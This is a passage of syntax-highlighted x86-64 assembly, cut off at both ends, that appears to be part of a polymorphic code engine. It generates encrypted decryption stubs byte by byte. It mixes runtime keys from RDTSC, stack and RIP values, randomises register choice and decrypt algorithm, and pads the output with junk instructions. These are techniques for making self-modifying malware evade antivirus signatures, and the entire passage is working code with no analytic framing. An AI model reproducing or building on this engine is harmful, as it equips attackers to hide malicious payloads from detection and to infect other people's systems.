<span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x05</span> <span class="nf">stosb</span> <span class="nf">ret</span> <span class="c1">; generate decryption stub</span> <span class="nl">stub_decrypt:</span> <span class="c1">; mov rbx,rax (save mmap result)</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x89</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC3</span> <span class="nf">stosb</span> <span class="c1">; calculate RIP-relative offset to embedded engine</span> <span class="nf">mov</span> <span class="nv">r15</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">p_entry</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">stub_sz</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">jnz</span> <span class="nv">.usszz</span> <span class="c1">; fallback calculation</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">sub</span> <span class="nb">rdx</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">p_entry</span><span class="p">]</span> <span class="nf">add</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">100</span> <span class="nl">.usszz:</span> <span class="nf">add</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdx</span> <span class="c1">; engine position</span> <span class="c1">; RIP-relative calculation</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nv">r15</span> <span class="nf">add</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mi">7</span> <span class="c1">; after LEA instruction</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="c1">; lea rsi,[rip+offset]</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x8D</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x35</span> <span class="nf">stosb</span> <span class="nf">stosd</span> <span class="c1">; mov rcx,engine_size</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC1</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">engine_size</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jnz</span> <span class="nv">.engine_sz</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">512</span> <span class="nl">.engine_sz:</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">65536</span> <span class="nf">jbe</span> <span class="nv">.size_ok</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">65536</span> <span class="nl">.size_ok:</span> <span class="nf">stosd</span> <span class="c1">; mov rdx,stub_key</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xBA</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">stub_key</span><span class="p">]</span> <span class="nf">stosq</span> <span class="c1">; decryption loop</span> <span class="nf">mov</span> <span class="nv">r14</span><span class="p">,</span> <span class="nb">rdi</span> <span class="c1">; test rcx,rcx</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x85</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC9</span> <span class="nf">stosb</span> <span class="c1">; jz done</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x74</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x10</span> <span class="nf">stosb</span> <span class="c1">; xor [rsi],dl</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x30</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x16</span> <span class="nf">stosb</span> <span class="c1">; rol rdx,7</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC1</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC2</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">stosb</span> <span class="c1">; inc rsi</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xFF</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC6</span> <span class="nf">stosb</span> <span class="c1">; dec rcx</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xFF</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC9</span> <span class="nf">stosb</span> <span class="c1">; jmp loop</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xEB</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">r14</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">neg</span> <span class="nb">al</span> <span class="nf">stosb</span> <span class="c1">; copy to allocated memory</span> <span class="c1">; mov rdi,rbx</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x89</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xDF</span> <span class="nf">stosb</span> <span class="c1">; calculate engine position</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">p_entry</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">stub_sz</span><span class="p">]</span> <span class="nf">add</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="c1">; RIP-relative offset</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">add</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="c1">; lea rsi,[rip+offset]</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x8D</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x35</span> <span class="nf">stosb</span> <span class="nf">stosd</span> <span class="c1">; mov rcx,engine_size</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC1</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">engine_size</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jnz</span> <span class="nv">.engine_sz2</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">256</span> <span class="nl">.engine_sz2:</span> <span class="nf">stosd</span> <span class="c1">; rep movsb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xF3</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xA4</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">RET_OPCODE</span> <span class="nf">stosb</span> <span class="nf">ret</span> <span class="nl">bf_boo:</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">p_entry</span><span class="p">]</span> <span class="nf">add</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">300</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">sz</span><span class="p">]</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">ret</span> <span class="c1">; generate runtime keys</span> <span class="nl">gen_runtm:</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="nf">push</span> <span class="nb">rcx</span> <span class="nf">rdtsc</span> <span class="c1">; entropy from RDTSC</span> <span class="nf">shl</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">32</span> <span class="nf">or</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">key</span><span class="p">]</span> <span class="c1">; mix with user key</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rsp</span> <span class="c1">; stack entropy</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nf">call</span> <span class="nv">.get_rip</span> <span class="c1">; RIP entropy</span> <span class="nl">.get_rip:</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nf">rol</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">13</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rax</span> <span class="c1">; dynamic constant</span> <span class="nf">ror</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mi">19</span> <span class="nf">xor</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">add</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rax</span> <span class="c1">; dynamic XOR</span> <span class="nf">rol</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">not</span> <span class="nb">rbx</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">stub_key</span><span class="p">],</span> <span class="nb">rax</span> <span class="nf">rol</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">7</span> <span class="c1">; secondary key</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mh">0xCAFE0F00</span> <span class="nf">shl</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mi">32</span> <span class="nf">or</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mh">0xDEADC0DE</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">sec_key</span><span class="p">],</span> <span class="nb">rax</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">stub_key</span><span class="p">]</span> <span class="c1">; ensure different from user key</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">key</span><span class="p">]</span> <span class="nf">jne</span> <span class="nv">.keys_different</span> <span class="nf">not</span> <span class="nb">rax</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">stub_key</span><span class="p">],</span> <span class="nb">rax</span> <span class="nl">.keys_different:</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">ret</span> <span class="c1">; PRNG</span> <span class="nl">next_random:</span> <span class="nf">push</span> <span class="nb">rdx</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">seed</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">shl</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">13</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">shr</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">17</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">shl</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">5</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">seed</span><span class="p">],</span> <span class="nb">rax</span> <span class="nf">pop</span> <span class="nb">rdx</span> <span class="nf">ret</span> <span class="nl">random_range:</span> <span class="nf">push</span> <span class="nb">rdx</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">test</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nb">rcx</span> <span class="nf">jz</span> <span class="nv">.range_zero</span> <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">div</span> <span class="nb">rcx</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdx</span> <span class="nf">ret</span> <span class="nl">.range_zero:</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">ret</span> <span class="c1">; random boolean</span> <span class="nl">yes_no:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0xF</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">setbe</span> <span class="nb">al</span> <span class="nf">movzx</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">al</span> <span class="nf">ret</span> <span class="c1">; select random registers</span> <span class="nl">get_rr:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">REG_RSP</span> <span class="nf">je</span> <span class="nv">get_rr</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">REG_RAX</span> <span class="c1">; avoid rax as base</span> <span class="nf">je</span> <span class="nv">get_rr</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">],</span> <span class="nb">al</span> <span class="nl">.retry_count:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">REG_RSP</span> <span class="nf">je</span> <span class="nv">.retry_count</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">REG_RAX</span> <span class="c1">; avoid rax as count</span> <span class="nf">je</span> <span class="nv">.retry_count</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">]</span> <span class="nf">je</span> <span class="nv">.retry_count</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_count</span><span class="p">],</span> <span class="nb">al</span> <span class="nl">.retry_key:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">REG_RSP</span> <span class="nf">je</span> <span class="nv">.retry_key</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">]</span> <span class="nf">je</span> <span class="nv">.retry_key</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_count</span><span class="p">]</span> <span class="nf">je</span> <span class="nv">.retry_key</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_key</span><span class="p">],</span> <span class="nb">al</span> <span class="nl">.retry_junk1:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">15</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">REG_RSP</span> <span class="nf">je</span> <span class="nv">.retry_junk1</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">junk_reg1</span><span class="p">],</span> <span class="nb">al</span> <span class="nl">.retry_junk2:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">15</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">REG_RSP</span> <span class="nf">je</span> <span class="nv">.retry_junk2</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">junk_reg1</span><span class="p">]</span> <span class="nf">je</span> <span class="nv">.retry_junk2</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">junk_reg2</span><span class="p">],</span> <span class="nb">al</span> <span class="nl">.retry_junk3:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">15</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">REG_RSP</span> <span class="nf">je</span> <span class="nv">.retry_junk3</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">junk_reg1</span><span class="p">]</span> <span class="nf">je</span> <span class="nv">.retry_junk3</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">junk_reg2</span><span class="p">]</span> <span class="nf">je</span> <span class="nv">.retry_junk3</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">junk_reg3</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">ret</span> <span class="c1">; select algorithm</span> <span class="nl">set_al:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nb">al</span><span class="nv">g0_dcr</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">ret</span> <span class="c1">; generate prologue</span> <span class="nl">gen_p:</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">yes_no</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.skip_trash1</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nl">.skip_trash1:</span> <span class="c1">; mov reg_key,key</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xB8</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_key</span><span class="p">]</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">prolog_set</span><span class="p">],</span> <span class="mi">1</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">key</span><span class="p">]</span> <span class="nf">stosq</span> <span class="nf">call</span> <span class="nv">yes_no</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.skip_trash2</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nl">.skip_trash2:</span> <span class="nf">ret</span> <span class="c1">; generate decrypt loop</span> <span class="nl">gen_dec:</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">jmp_back</span><span class="p">],</span> <span class="nb">rdi</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="c1">; mov reg_base,rdi (data pointer)</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x89</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xF8</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">]</span> <span class="nf">stosb</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="c1">; mov reg_count,rsi (size)</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x89</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xF0</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_count</span><span class="p">]</span> <span class="nf">stosb</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="nl">.decr_loop:</span> <span class="nf">movzx</span> <span class="nb">rax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">rel</span> <span class="nb">al</span><span class="nv">g0_dcr</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">je</span> <span class="nv">.gen_algo_0</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">je</span> <span class="nv">.gen_algo_1</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">je</span> <span class="nv">.gen_algo_2</span> <span class="nf">jmp</span> <span class="nv">.gen_algo_3</span> <span class="nl">.gen_algo_0:</span> <span class="c1">; add/rol/xor</span> <span class="nf">call</span> <span class="nv">gen_add_mem_key</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_trash</span> <span class="nf">call</span> <span class="nv">gen_rol_mem_16</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_trash</span> <span class="nf">call</span> <span class="nv">gen_xor_mem_key</span> <span class="nf">jmp</span> <span class="nv">.gen_loop_end</span> <span class="nl">.gen_algo_1:</span> <span class="c1">; xor/rol/xor</span> <span class="nf">call</span> <span class="nv">gen_xor_mem_key</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_trash</span> <span class="nf">call</span> <span class="nv">gen_rol_mem_16</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_trash</span> <span class="nf">call</span> <span class="nv">gen_xor_mem_key</span> <span class="nf">jmp</span> <span class="nv">.gen_loop_end</span> <span class="nl">.gen_algo_2:</span> <span class="c1">; sub/ror/xor</span> <span class="nf">call</span> <span class="nv">gen_sub_mem_key</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_trash</span> <span class="nf">call</span> <span class="nv">gen_ror_mem_16</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_trash</span> <span class="nf">call</span> <span class="nv">gen_xor_mem_key</span> <span class="nf">jmp</span> <span class="nv">.gen_loop_end</span> <span class="nl">.gen_algo_3:</span> <span class="c1">; xor/add/xor</span> <span class="nf">call</span> <span class="nv">gen_xor_mem_key</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_trash</span> <span class="nf">call</span> <span class="nv">gen_add_mem_key</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_trash</span> <span class="nf">call</span> <span class="nv">gen_xor_mem_key</span> <span class="nl">.gen_loop_end:</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">ADD_REG_IMM8</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">]</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">8</span> <span class="nf">stosb</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="c1">; generate DEC instruction</span> <span class="nf">movzx</span> <span class="nb">rax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_count</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">8</span> <span class="nf">jb</span> <span class="nv">.dec_no_rex</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x49</span> <span class="c1">; rex.wb for r8-r15</span> <span class="nf">stosb</span> <span class="nf">movzx</span> <span class="nb">rax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_count</span><span class="p">]</span> <span class="nf">sub</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">8</span> <span class="nf">jmp</span> <span class="nv">.dec_encode</span> <span class="nl">.dec_no_rex:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="c1">; rex.w for rax-rdi</span> <span class="nf">stosb</span> <span class="nf">movzx</span> <span class="nb">rax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_count</span><span class="p">]</span> <span class="nl">.dec_encode:</span> <span class="nf">mov</span> <span class="nb">ah</span><span class="p">,</span> <span class="mh">0xFF</span> <span class="nf">xchg</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">ah</span> <span class="nf">stosw</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC8</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_count</span><span class="p">]</span> <span class="nf">and</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">TEST_REG_REG</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_count</span><span class="p">]</span> <span class="nf">shl</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">add</span> <span class="nb">al</span><span 